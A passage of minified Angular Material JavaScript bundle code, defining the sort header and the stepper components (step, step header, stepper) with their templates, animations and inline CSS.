new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const LCe={provide:dA,deps:[[new Cc,new Fc,dA]],useFactory:function NCe(t){return t||new dA}},zCe=Jc(class{});let Mp=(()=>{class t extends zCe{constructor(e,i,n,r,c,d,T,k){super(),this._intl=e,this._changeDetectorRef=i,this._sort=n,this._columnDef=r,this._focusMonitor=c,this._elementRef=d,this._ariaDescriber=T,this._showIndicatorHint=!1,this._viewState={},this._arrowDirection="",this._disableViewStateAnimation=!1,this.arrowPosition="after",this._sortActionDescription="Sort",null!=k&&k.arrowPosition&&(this.arrowPosition=null==k?void 0:k.arrowPosition),this._handleStateChanges()}get sortActionDescription(){return this._sortActionDescription}set sortActionDescription(e){this._updateSortActionDescription(e)}get disableClear(){return this._disableClear}set disableClear(e){this._disableClear=wi(e)}ngOnInit(){!this.id&&this._columnDef&&(this.id=this._columnDef.name),this._updateArrowDirection(),this._setAnimationTransitionState({toState:this._isSorted()?"active":this._arrowDirection}),this._sort.register(this),this._sortButton=this._elementRef.nativeElement.querySelector(".mat-sort-header-container"),this._updateSortActionDescription(this._sortActionDescription)}ngAfterViewInit(){this._focusMonitor.monitor(this._elementRef,!0).subscribe(e=>{const i=!!e;i!==this._showIndicatorHint&&(this._setIndicatorHintVisible(i),this._changeDetectorRef.markForCheck())})}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef),this._sort.deregister(this),this._rerenderSubscription.unsubscribe()}_setIndicatorHintVisible(e){this._isDisabled()&&e||(this._showIndicatorHint=e,this._isSorted()||(this._updateArrowDirection(),this._setAnimationTransitionState(this._showIndicatorHint?{fromState:this._arrowDirection,toState:"hint"}:{fromState:"hint",toState:this._arrowDirection})))}_setAnimationTransitionState(e){this._viewState=e||{},this._disableViewStateAnimation&&(this._viewState={toState:e.toState})}_toggleOnInteraction(){this._sort.sort(this),("hint"===this._viewState.toState||"active"===this._viewState.toState)&&(this._disableViewStateAnimation=!0)}_handleClick(){this._isDisabled()||this._sort.sort(this)}_handleKeydown(e){!this._isDisabled()&&(32===e.keyCode||13===e.keyCode)&&(e.preventDefault(),this._toggleOnInteraction())}_isSorted(){return this._sort.active==this.id&&("asc"===this._sort.direction||"desc"===this._sort.direction)}_getArrowDirectionState(){return`${this._isSorted()?"active-":""}${this._arrowDirection}`}_getArrowViewState(){const e=this._viewState.fromState;return(e?`${e}-to-`:"")+this._viewState.toState}_updateArrowDirection(){this._arrowDirection=this._isSorted()?this._sort.direction:this.start||this._sort.start}_isDisabled(){return this._sort.disabled||this.disabled}_getAriaSortAttribute(){return this._isSorted()?"asc"==this._sort.direction?"ascending":"descending":"none"}_renderArrow(){return!this._isDisabled()||this._isSorted()}_updateSortActionDescription(e){var i,n;this._sortButton&&(null===(i=this._ariaDescriber)||void 0===i||i.removeDescription(this._sortButton,this._sortActionDescription),null===(n=this._ariaDescriber)||void 0===n||n.describe(this._sortButton,e)),this._sortActionDescription=e}_handleStateChanges(){this._rerenderSubscription=ra(this._sort.sortChange,this._sort._stateChanges,this._intl.changes).subscribe(()=>{this._isSorted()&&(this._updateArrowDirection(),("hint"===this._viewState.toState||"active"===this._viewState.toState)&&(this._disableViewStateAnimation=!0),this._setAnimationTransitionState({fromState:this._arrowDirection,toState:"active"}),this._showIndicatorHint=!1),!this._isSorted()&&this._viewState&&"active"===this._viewState.toState&&(this._disableViewStateAnimation=!1,this._setAnimationTransitionState({fromState:"active",toState:this._arrowDirection})),this._changeDetectorRef.markForCheck()})}}return t.\u0275fac=function(e){return new(e||t)(Ee(dA),Ee(Ma),Ee(il,8),Ee("MAT_SORT_HEADER_COLUMN_DEF",8),Ee(js),Ee(mi),Ee(Pw,8),Ee(FV,8))},t.\u0275cmp=Wt({type:t,selectors:[["","mat-sort-header",""]],hostAttrs:[1,"mat-sort-header"],hostVars:3,hostBindings:function(e,i){1&e&&he("click",function(){return i._handleClick()})("keydown",function(r){return i._handleKeydown(r)})("mouseenter",function(){return i._setIndicatorHintVisible(!0)})("mouseleave",function(){return i._setIndicatorHintVisible(!1)}),2&e&&(Rt("aria-sort",i._getAriaSortAttribute()),Ct("mat-sort-header-disabled",i._isDisabled()))},inputs:{disabled:"disabled",id:["mat-sort-header","id"],arrowPosition:"arrowPosition",start:"start",sortActionDescription:"sortActionDescription",disableClear:"disableClear"},exportAs:["matSortHeader"],features:[ci],attrs:RCe,ngContentSelectors:kCe,decls:4,vars:7,consts:[[1,"mat-sort-header-container","mat-focus-indicator"],[1,"mat-sort-header-content"],["class","mat-sort-header-arrow",4,"ngIf"],[1,"mat-sort-header-arrow"],[1,"mat-sort-header-stem"],[1,"mat-sort-header-indicator"],[1,"mat-sort-header-pointer-left"],[1,"mat-sort-header-pointer-right"],[1,"mat-sort-header-pointer-middle"]],template:function(e,i){1&e&&(Jn(),m(0,"div",0)(1,"div",1),va(2),u(),ne(3,SCe,6,6,"div",2),u()),2&e&&(Ct("mat-sort-header-sorted",i._isSorted())("mat-sort-header-position-before","before"===i.arrowPosition),Rt("tabindex",i._isDisabled()?null:0)("role",i._isDisabled()?null:"button"),C(3),V("ngIf",i._renderArrow()))},dependencies:[Ri],styles:[".mat-sort-header-container{display:flex;cursor:pointer;align-items:center;letter-spacing:normal;outline:0}[mat-sort-header].cdk-keyboard-focused .mat-sort-header-container,[mat-sort-header].cdk-program-focused .mat-sort-header-container{border-bottom:solid 1px currentColor}.mat-sort-header-disabled .mat-sort-header-container{cursor:default}.mat-sort-header-container::before{margin:calc(calc(var(--mat-focus-indicator-border-width, 3px) + 2px) * -1)}.mat-sort-header-content{text-align:center;display:flex;align-items:center}.mat-sort-header-position-before{flex-direction:row-reverse}.mat-sort-header-arrow{height:12px;width:12px;min-width:12px;position:relative;display:flex;opacity:0}.mat-sort-header-arrow,[dir=rtl] .mat-sort-header-position-before .mat-sort-header-arrow{margin:0 0 0 6px}.mat-sort-header-position-before .mat-sort-header-arrow,[dir=rtl] .mat-sort-header-arrow{margin:0 6px 0 0}.mat-sort-header-stem{background:currentColor;height:10px;width:2px;margin:auto;display:flex;align-items:center}.cdk-high-contrast-active .mat-sort-header-stem{width:0;border-left:solid 2px}.mat-sort-header-indicator{width:100%;height:2px;display:flex;align-items:center;position:absolute;top:0;left:0}.mat-sort-header-pointer-middle{margin:auto;height:2px;width:2px;background:currentColor;transform:rotate(45deg)}.cdk-high-contrast-active .mat-sort-header-pointer-middle{width:0;height:0;border-top:solid 2px;border-left:solid 2px}.mat-sort-header-pointer-left,.mat-sort-header-pointer-right{background:currentColor;width:6px;height:2px;position:absolute;top:0}.cdk-high-contrast-active .mat-sort-header-pointer-left,.cdk-high-contrast-active .mat-sort-header-pointer-right{width:0;height:0;border-left:solid 6px;border-top:solid 2px}.mat-sort-header-pointer-left{transform-origin:right;left:0}.mat-sort-header-pointer-right{transform-origin:left;right:0}"],encapsulation:2,data:{animation:[U1.indicator,U1.leftPointer,U1.rightPointer,U1.arrowOpacity,U1.arrowPosition,U1.allowChildren]},changeDetection:0}),t})(),VV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[LCe],imports:[rn,la]}),t})();function WCe(t,a){1&t&&va(0)}const FCe=["*"];let BV=(()=>{class t{constructor(e){this._elementRef=e}focus(){this._elementRef.nativeElement.focus()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","cdkStepHeader",""]],hostAttrs:["role","tab"]}),t})(),HV=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","cdkStepLabel",""]]}),t})(),VCe=0;const UV=new ni("STEPPER_GLOBAL_OPTIONS");let D8=(()=>{class t{constructor(e,i){this._stepper=e,this.interacted=!1,this.interactedStream=new Tt,this._editable=!0,this._optional=!1,this._completedOverride=null,this._customError=null,this._stepperOptions=i||{},this._displayDefaultIndicatorType=!1!==this._stepperOptions.displayDefaultIndicatorType}get editable(){return this._editable}set editable(e){this._editable=wi(e)}get optional(){return this._optional}set optional(e){this._optional=wi(e)}get completed(){return null==this._completedOverride?this._getDefaultCompleted():this._completedOverride}set completed(e){this._completedOverride=wi(e)}_getDefaultCompleted(){return this.stepControl?this.stepControl.valid&&this.interacted:this.interacted}get hasError(){return null==this._customError?this._getDefaultError():this._customError}set hasError(e){this._customError=wi(e)}_getDefaultError(){return this.stepControl&&this.stepControl.invalid&&this.interacted}select(){this._stepper.selected=this}reset(){this.interacted=!1,null!=this._completedOverride&&(this._completedOverride=!1),null!=this._customError&&(this._customError=!1),this.stepControl&&this.stepControl.reset()}ngOnChanges(){this._stepper._stateChanged()}_markAsInteracted(){this.interacted||(this.interacted=!0,this.interactedStream.emit(this))}_showError(){var e;return null!==(e=this._stepperOptions.showError)&&void 0!==e?e:null!=this._customError}}return t.\u0275fac=function(e){return new(e||t)(Ee(ja(()=>ub)),Ee(UV,8))},t.\u0275cmp=Wt({type:t,selectors:[["cdk-step"]],contentQueries:function(e,i,n){if(1&e&&ha(n,HV,5),2&e){let r;Vt(r=Bt())&&(i.stepLabel=r.first)}},viewQuery:function(e,i){if(1&e&&Mi(ho,7),2&e){let n;Vt(n=Bt())&&(i.content=n.first)}},inputs:{stepControl:"stepControl",label:"label",errorMessage:"errorMessage",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],state:"state",editable:"editable",optional:"optional",completed:"completed",hasError:"hasError"},outputs:{interactedStream:"interacted"},exportAs:["cdkStep"],features:[sa],ngContentSelectors:FCe,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),ne(0,WCe,1,0,"ng-template"))},encapsulation:2,changeDetection:0}),t})(),ub=(()=>{class t{constructor(e,i,n){this._dir=e,this._changeDetectorRef=i,this._elementRef=n,this._destroyed=new J,this.steps=new gd,this._sortedHeaders=new gd,this._linear=!1,this._selectedIndex=0,this.selectionChange=new Tt,this._orientation="horizontal",this._groupId=VCe++}get linear(){return this._linear}set linear(e){this._linear=wi(e)}get selectedIndex(){return this._selectedIndex}set selectedIndex(e){var i;const n=Uo(e);this.steps&&this._steps?(this._isValidIndex(n),null===(i=this.selected)||void 0===i||i._markAsInteracted(),this._selectedIndex!==n&&!this._anyControlsInvalidOrPending(n)&&(n>=this._selectedIndex||this.steps.toArray()[n].editable)&&this._updateSelectedItemIndex(n)):this._selectedIndex=n}get selected(){return this.steps?this.steps.toArray()[this.selectedIndex]:void 0}set selected(e){this.selectedIndex=e&&this.steps?this.steps.toArray().indexOf(e):-1}get orientation(){return this._orientation}set orientation(e){this._orientation=e,this._keyManager&&this._keyManager.withVerticalOrientation("vertical"===e)}ngAfterContentInit(){this._steps.changes.pipe(Ro(this._steps),ea(this._destroyed)).subscribe(e=>{this.steps.reset(e.filter(i=>i._stepper===this)),this.steps.notifyOnChanges()})}ngAfterViewInit(){this._stepHeader.changes.pipe(Ro(this._stepHeader),ea(this._destroyed)).subscribe(e=>{this._sortedHeaders.reset(e.toArray().sort((i,n)=>i._elementRef.nativeElement.compareDocumentPosition(n._elementRef.nativeElement)&Node.DOCUMENT_POSITION_FOLLOWING?-1:1)),this._sortedHeaders.notifyOnChanges()}),this._keyManager=new L1(this._sortedHeaders).withWrap().withHomeAndEnd().withVerticalOrientation("vertical"===this._orientation),(this._dir?this._dir.change:Bi()).pipe(Ro(this._layoutDirection()),ea(this._destroyed)).subscribe(e=>this._keyManager.withHorizontalOrientation(e)),this._keyManager.updateActiveItem(this._selectedIndex),this.steps.changes.subscribe(()=>{this.selected||(this._selectedIndex=Math.max(this._selectedIndex-1,0))}),this._isValidIndex(this._selectedIndex)||(this._selectedIndex=0)}ngOnDestroy(){this.steps.destroy(),this._sortedHeaders.destroy(),this._destroyed.next(),this._destroyed.complete()}next(){this.selectedIndex=Math.min(this._selectedIndex+1,this.steps.length-1)}previous(){this.selectedIndex=Math.max(this._selectedIndex-1,0)}reset(){this._updateSelectedItemIndex(0),this.steps.forEach(e=>e.reset()),this._stateChanged()}_getStepLabelId(e){return`cdk-step-label-${this._groupId}-${e}`}_getStepContentId(e){return`cdk-step-content-${this._groupId}-${e}`}_stateChanged(){this._changeDetectorRef.markForCheck()}_getAnimationDirection(e){const i=e-this._selectedIndex;return i<0?"rtl"===this._layoutDirection()?"next":"previous":i>0?"rtl"===this._layoutDirection()?"previous":"next":"current"}_getIndicatorType(e,i="number"){const n=this.steps.toArray()[e],r=this._isCurrentStep(e);return n._displayDefaultIndicatorType?this._getDefaultIndicatorLogic(n,r):this._getGuidelineLogic(n,r,i)}_getDefaultIndicatorLogic(e,i){return e._showError()&&e.hasError&&!i?"error":!e.completed||i?"number":e.editable?"edit":"done"}_getGuidelineLogic(e,i,n="number"){return e._showError()&&e.hasError&&!i?"error":e.completed&&!i?"done":e.completed&&i?n:e.editable&&i?"edit":n}_isCurrentStep(e){return this._selectedIndex===e}_getFocusIndex(){return this._keyManager?this._keyManager.activeItemIndex:this._selectedIndex}_updateSelectedItemIndex(e){const i=this.steps.toArray();this.selectionChange.emit({selectedIndex:e,previouslySelectedIndex:this._selectedIndex,selectedStep:i[e],previouslySelectedStep:i[this._selectedIndex]}),this._containsFocus()?this._keyManager.setActiveItem(e):this._keyManager.updateActiveItem(e),this._selectedIndex=e,this._stateChanged()}_onKeydown(e){const i=Zr(e),n=e.keyCode,r=this._keyManager;null==r.activeItemIndex||i||32!==n&&13!==n?r.onKeydown(e):(this.selectedIndex=r.activeItemIndex,e.preventDefault())}_anyControlsInvalidOrPending(e){return!!(this._linear&&e>=0)&&this.steps.toArray().slice(0,e).some(i=>{const n=i.stepControl;return(n?n.invalid||n.pending||!i.interacted:!i.completed)&&!i.optional&&!i._completedOverride})}_layoutDirection(){return this._dir&&"rtl"===this._dir.value?"rtl":"ltr"}_containsFocus(){const e=this._elementRef.nativeElement,i=g3();return e===i||e.contains(i)}_isValidIndex(e){return e>-1&&(!this.steps||e<this.steps.length)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Cr,8),Ee(Ma),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","cdkStepper",""]],contentQueries:function(e,i,n){if(1&e&&(ha(n,D8,5),ha(n,BV,5)),2&e){let r;Vt(r=Bt())&&(i._steps=r),Vt(r=Bt())&&(i._stepHeader=r)}},inputs:{linear:"linear",selectedIndex:"selectedIndex",selected:"selected",orientation:"orientation"},outputs:{selectionChange:"selectionChange"},exportAs:["cdkStepper"]}),t})(),BCe=(()=>{class t{constructor(e){this._stepper=e,this.type="submit"}}return t.\u0275fac=function(e){return new(e||t)(Ee(ub))},t.\u0275dir=Ot({type:t,selectors:[["button","cdkStepperNext",""]],hostVars:1,hostBindings:function(e,i){1&e&&he("click",function(){return i._stepper.next()}),2&e&&Gs("type",i.type)},inputs:{type:"type"}}),t})(),HCe=(()=>{class t{constructor(e){this._stepper=e,this.type="button"}}return t.\u0275fac=function(e){return new(e||t)(Ee(ub))},t.\u0275dir=Ot({type:t,selectors:[["button","cdkStepperPrevious",""]],hostVars:1,hostBindings:function(e,i){1&e&&he("click",function(){return i._stepper.previous()}),2&e&&Gs("type",i.type)},inputs:{type:"type"}}),t})(),UCe=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[R1]}),t})();function qCe(t,a){if(1&t&&Ir(0,8),2&t){const e=B();V("ngTemplateOutlet",e.iconOverrides[e.state])("ngTemplateOutletContext",e._getIconContext())}}function GCe(t,a){if(1&t&&(m(0,"span",13),s(1),u()),2&t){const e=B(2);C(1),ke(e._getDefaultTextForState(e.state))}}function jCe(t,a){if(1&t&&(m(0,"span",14),s(1),u()),2&t){const e=B(2);C(1),ke(e._intl.completedLabel)}}function QCe(t,a){if(1&t&&(m(0,"span",14),s(1),u()),2&t){const e=B(2);C(1),ke(e._intl.editableLabel)}}function $Ce(t,a){if(1&t&&(m(0,"mat-icon",13),s(1),u()),2&t){const e=B(2);C(1),ke(e._getDefaultTextForState(e.state))}}function KCe(t,a){if(1&t&&(bt(0,9),ne(1,GCe,2,1,"span",10),ne(2,jCe,2,1,"span",11),ne(3,QCe,2,1,"span",11),ne(4,$Ce,2,1,"mat-icon",12),Mt()),2&t){const e=B();V("ngSwitch",e.state),C(1),V("ngSwitchCase","number"),C(1),V("ngIf","done"===e.state),C(1),V("ngIf","edit"===e.state)}}function XCe(t,a){if(1&t&&(m(0,"div",15),Ir(1,16),u()),2&t){const e=B();C(1),V("ngTemplateOutlet",e._templateLabel().template)}}function YCe(t,a){if(1&t&&(m(0,"div",15),s(1),u()),2&t){const e=B();C(1),ke(e.label)}}function JCe(t,a){if(1&t&&(m(0,"div",17),s(1),u()),2&t){const e=B();C(1),ke(e._intl.optionalLabel)}}function ZCe(t,a){if(1&t&&(m(0,"div",18),s(1),u()),2&t){const e=B();C(1),ke(e.errorMessage)}}function eye(t,a){}function tye(t,a){if(1&t&&(va(0),ne(1,eye,0,0,"ng-template",0)),2&t){const e=B();C(1),V("cdkPortalOutlet",e._portal)}}const iye=["*"];function aye(t,a){1&t&&it(0,"div",11)}const qV=function(t,a){return{step:t,i:a}};function nye(t,a){if(1&t&&(bt(0),Ir(1,9),ne(2,aye,1,0,"div",10),Mt()),2&t){const e=a.$implicit,i=a.index,n=a.last;B(2);const r=Ti(4);C(1),V("ngTemplateOutlet",r)("ngTemplateOutletContext",Ah(3,qV,e,i)),C(1),V("ngIf",!n)}}const GV=function(t){return{animationDuration:t}},jV=function(t,a){return{value:t,params:a}};function oye(t,a){if(1&t){const e=Ye();m(0,"div",12),he("@horizontalStepTransition.done",function(n){return be(e),Me(B(2)._animationDone.next(n))}),Ir(1,13),u()}if(2&t){const e=a.$implicit,i=a.index,n=B(2);Ct("mat-horizontal-stepper-content-inactive",n.selectedIndex!==i),V("@horizontalStepTransition",Ah(8,jV,n._getAnimationDirection(i),fr(6,GV,n._getAnimationDuration())))("id",n._getStepContentId(i)),Rt("aria-labelledby",n._getStepLabelId(i)),C(1),V("ngTemplateOutlet",e.content)}}function rye(t,a){if(1&t&&(m(0,"div",4)(1,"div",5),ne(2,nye,3,6,"ng-container",6),u(),m(3,"div",7),ne(4,oye,2,11,"div",8),u()()),2&t){const e=B();C(2),V("ngForOf",e.steps),C(2),V("ngForOf",e.steps)}}function sye(t,a){if(1&t){const e=Ye();m(0,"div",15),Ir(1,9),m(2,"div",16)(3,"div",17),he("@verticalStepTransition.done",function(n){return be(e),Me(B(2)._animationDone.next(n))}),m(4,"div",18),Ir(5,13),u()()()()}if(2&t){const e=a.$implicit,i=a.index,n=a.last,r=B(2),c=Ti(4);C(1),V("ngTemplateOutlet",c)("ngTemplateOutletContext",Ah(10,qV,e,i)),C(1),Ct("mat-stepper-vertical-line",!n),C(1),Ct("mat-vertical-stepper-content-inactive",r.selectedIndex!==i),V("@verticalStepTransition",Ah(15,jV,r._getAnimationDirection(i),fr(13,GV,r._getAnimationDuration())))("id",r._getStepContentId(i)),Rt("aria-labelledby",r._getStepLabelId(i)),C(2),V("ngTemplateOutlet",e.content)}}function cye(t,a){if(1&t&&(bt(0),ne(1,sye,6,18,"div",14),Mt()),2&t){const e=B();C(1),V("ngForOf",e.steps)}}function lye(t,a){if(1&t){const e=Ye();m(0,"mat-step-header",19),he("click",function(){return Me(be(e).step.select())})("keydown",function(n){return be(e),Me(B()._onKeydown(n))}),u()}if(2&t){const e=a.step,i=a.i,n=B();Ct("mat-horizontal-stepper-header","horizontal"===n.orientation)("mat-vertical-stepper-header","vertical"===n.orientation),V("tabIndex",n._getFocusIndex()===i?0:-1)("id",n._getStepLabelId(i))("index",i)("state",n._getIndicatorType(i,e.state))("label",e.stepLabel||e.label)("selected",n.selectedIndex===i)("active",n._stepIsNavigable(i,e))("optional",e.optional)("errorMessage",e.errorMessage)("iconOverrides",n._iconOverrides)("disableRipple",n.disableRipple||!n._stepIsNavigable(i,e))("color",e.color||n.color),Rt("aria-posinset",i+1)("aria-setsize",n.steps.length)("aria-controls",n._getStepContentId(i))("aria-selected",n.selectedIndex==i)("aria-label",e.ariaLabel||null)("aria-labelledby",!e.ariaLabel&&e.ariaLabelledby?e.ariaLabelledby:null)("aria-disabled",!n._stepIsNavigable(i,e)||null)}}let mA=(()=>{class t extends HV{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matStepLabel",""]],features:[ci]}),t})(),uA=(()=>{class t{constructor(){this.changes=new J,this.optionalLabel="Optional",this.completedLabel="Completed",this.editableLabel="Editable"}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const mye={provide:uA,deps:[[new Cc,new Fc,uA]],useFactory:function dye(t){return t||new uA}},uye=kd(class extends BV{constructor(a){super(a)}},"primary");let QV=(()=>{class t extends uye{constructor(e,i,n,r){super(n),this._intl=e,this._focusMonitor=i,this._intlSubscription=e.changes.subscribe(()=>r.markForCheck())}ngAfterViewInit(){this._focusMonitor.monitor(this._elementRef,!0)}ngOnDestroy(){this._intlSubscription.unsubscribe(),this._focusMonitor.stopMonitoring(this._elementRef)}focus(e,i){e?this._focusMonitor.focusVia(this._elementRef,e,i):this._elementRef.nativeElement.focus(i)}_stringLabel(){return this.label instanceof mA?null:this.label}_templateLabel(){return this.label instanceof mA?this.label:null}_getHostElement(){return this._elementRef.nativeElement}_getIconContext(){return{index:this.index,active:this.active,optional:this.optional}}_getDefaultTextForState(e){return"number"==e?`${this.index+1}`:"edit"==e?"create":"error"==e?"warning":e}}return t.\u0275fac=function(e){return new(e||t)(Ee(uA),Ee(js),Ee(mi),Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["mat-step-header"]],hostAttrs:["role","tab",1,"mat-step-header"],inputs:{color:"color",state:"state",label:"label",errorMessage:"errorMessage",iconOverrides:"iconOverrides",index:"index",selected:"selected",active:"active",optional:"optional",disableRipple:"disableRipple"},features:[ci],decls:10,vars:19,consts:[["matRipple","",1,"mat-step-header-ripple","mat-focus-indicator",3,"matRippleTrigger","matRippleDisabled"],[1,"mat-step-icon-content",3,"ngSwitch"],[3,"ngTemplateOutlet","ngTemplateOutletContext",4,"ngSwitchCase"],[3,"ngSwitch",4,"ngSwitchDefault"],[1,"mat-step-label"],["class","mat-step-text-label",4,"ngIf"],["class","mat-step-optional",4,"ngIf"],["class","mat-step-sub-label-error",4,"ngIf"],[3,"ngTemplateOutlet","ngTemplateOutletContext"],[3,"ngSwitch"],["aria-hidden","true",4,"ngSwitchCase"],["class","cdk-visually-hidden",4,"ngIf"],["aria-hidden","true",4,"ngSwitchDefault"],["aria-hidden","true"],[1,"cdk-visually-hidden"],[1,"mat-step-text-label"],[3,"ngTemplateOutlet"],[1,"mat-step-optional"],[1,"mat-step-sub-label-error"]],template:function(e,i){1&e&&(it(0,"div",0),m(1,"div")(2,"div",1),ne(3,qCe,1,2,"ng-container",2),ne(4,KCe,5,4,"ng-container",3),u()(),m(5,"div",4),ne(6,XCe,2,1,"div",5),ne(7,YCe,2,1,"div",5),ne(8,JCe,2,1,"div",6),ne(9,ZCe,2,1,"div",7),u()),2&e&&(V("matRippleTrigger",i._getHostElement())("matRippleDisabled",i.disableRipple),C(1),Dv("mat-step-icon-state-",i.state," mat-step-icon"),Ct("mat-step-icon-selected",i.selected),C(1),V("ngSwitch",!(!i.iconOverrides||!i.iconOverrides[i.state])),C(1),V("ngSwitchCase",!0),C(2),Ct("mat-step-label-active",i.active)("mat-step-label-selected",i.selected)("mat-step-label-error","error"==i.state),C(1),V("ngIf",i._templateLabel()),C(1),V("ngIf",i._stringLabel()),C(1),V("ngIf",i.optional&&"error"!=i.state),C(1),V("ngIf","error"==i.state))},dependencies:[Ri,_1,Zf,p1,d6,oa,xl],styles:['.mat-step-header{overflow:hidden;outline:none;cursor:pointer;position:relative;box-sizing:content-box;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mat-step-header:focus .mat-focus-indicator::before{content:""}.cdk-high-contrast-active .mat-step-header{outline:solid 1px}.cdk-high-contrast-active .mat-step-header[aria-selected=true] .mat-step-label{text-decoration:underline}.mat-step-optional,.mat-step-sub-label-error{font-size:12px}.mat-step-icon{border-radius:50%;height:24px;width:24px;flex-shrink:0;position:relative}.mat-step-icon-content{position:absolute;top:50%;left:50%;transform:translate(-50%, -50%);display:flex}.mat-step-icon .mat-icon{font-size:16px;height:16px;width:16px}.mat-step-icon-state-error .mat-icon{font-size:24px;height:24px;width:24px}.mat-step-label{display:inline-block;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;min-width:50px;vertical-align:middle}.mat-step-text-label{text-overflow:ellipsis;overflow:hidden}.mat-step-header .mat-step-header-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}'],encapsulation:2,changeDetection:0}),t})();const XV={horizontalStepTransition:ar("horizontalStepTransition",[sn("previous",zi({transform:"translate3d(-100%, 0, 0)",visibility:"hidden"})),sn("current",zi({transform:"none",visibility:"inherit"})),sn("next",zi({transform:"translate3d(100%, 0, 0)",visibility:"hidden"})),gn("* => *",En("{{animationDuration}} cubic-bezier(0.35, 0, 0.25, 1)"),{params:{animationDuration:"500ms"}})]),verticalStepTransition:ar("verticalStepTransition",[sn("previous",zi({height:"0px",visibility:"hidden"})),sn("next",zi({height:"0px",visibility:"hidden"})),sn("current",zi({height:"*",visibility:"inherit"})),gn("* <=> current",En("{{animationDuration}} cubic-bezier(0.4, 0.0, 0.2, 1)"),{params:{animationDuration:"225ms"}})])};let hye=(()=>{class t{constructor(e){this.templateRef=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["ng-template","matStepperIcon",""]],inputs:{name:["matStepperIcon","name"]}}),t})(),fye=(()=>{class t{constructor(e){this._template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["ng-template","matStepContent",""]]}),t})(),YV=(()=>{class t extends D8{constructor(e,i,n,r){super(e,r),this._errorStateMatcher=i,this._viewContainerRef=n,this._isSelected=I.EMPTY}ngAfterContentInit(){this._isSelected=this._stepper.steps.changes.pipe(Ur(()=>this._stepper.selectionChange.pipe(Xe(e=>e.selectedStep===this),Ro(this._stepper.selected===this)))).subscribe(e=>{e&&this._lazyContent&&!this._portal&&(this._portal=new Mm(this._lazyContent._template,this._viewContainerRef))})}ngOnDestroy(){this._isSelected.unsubscribe()}isErrorState(e,i){return this._errorStateMatcher.isErrorState(e,i)||!!(e&&e.invalid&&this.interacted)}}return t.\u0275fac=function(e){return new(e||t)(Ee(ja(()=>JV)),Ee(up,4),Ee(fo),Ee(UV,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-step"]],contentQueries:function(e,i,n){if(1&e&&(ha(n,mA,5),ha(n,fye,5)),2&e){let r;Vt(r=Bt())&&(i.stepLabel=r.first),Vt(r=Bt())&&(i._lazyContent=r.first)}},inputs:{color:"color"},exportAs:["matStep"],features:[ki([{provide:up,useExisting:t},{provide:D8,useExisting:t}]),ci],ngContentSelectors:iye,decls:1,vars:0,consts:[[3,"cdkPortalOutlet"]],template:function(e,i){1&e&&(Jn(),ne(0,tye,2,1,"ng-template"))},dependencies:[Cu],encapsulation:2,changeDetection:0}),t})(),JV=(()=>{class t extends ub{constructor(e,i,n){super(e,i,n),this.steps=new gd,this.animationDone=new Tt,this.labelPosition="end",this.headerPosition="top",this._iconOverrides={},this._animationDone=new J,this._animationDuration="";const r=n.nativeElement.nodeName.toLowerCase();this.orientation="mat-vertical-stepper"===r?"vertical":"horizontal"}get animationDuration(){return this._animationDuration}set animationDuration(e){this._animationDuration=/^\d+$/.test(e)?e+"ms":e}ngAfterContentInit(){super.ngAfterContentInit(),this._icons.forEach(({name:e,templateRef:i})=>this._iconOverrides[e]=i),this.steps.changes.pipe(ea(this._destroyed)).subscribe(()=>{this._stateChanged()}),this._animationDone.pipe(Bh((e,i)=>e.fromState===i.fromState&&e.toState===i.toState),ea(this._destroyed)).subscribe(e=>{"current"===e.toState&&this.animationDone.emit()})}_stepIsNavigable(e,i){return i.completed||this.selectedIndex===e||!this.linear}_getAnimationDuration(){return this.animationDuration?this.animationDuration:"horizontal"===this.orientation?"500ms":"225ms"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Cr,8),Ee(Ma),Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["mat-stepper"],["mat-vertical-stepper"],["mat-horizontal-stepper"],["","matStepper",""]],contentQueries:function(e,i,n){if(1&e&&(ha(n,YV,5),ha(n,hye,5)),2&e){let r;Vt(r=Bt())&&(i._steps=r),Vt(r=Bt())&&(i._icons=r)}},viewQuery:function(e,i){if(1&e&&Mi(QV,5),2&e){let 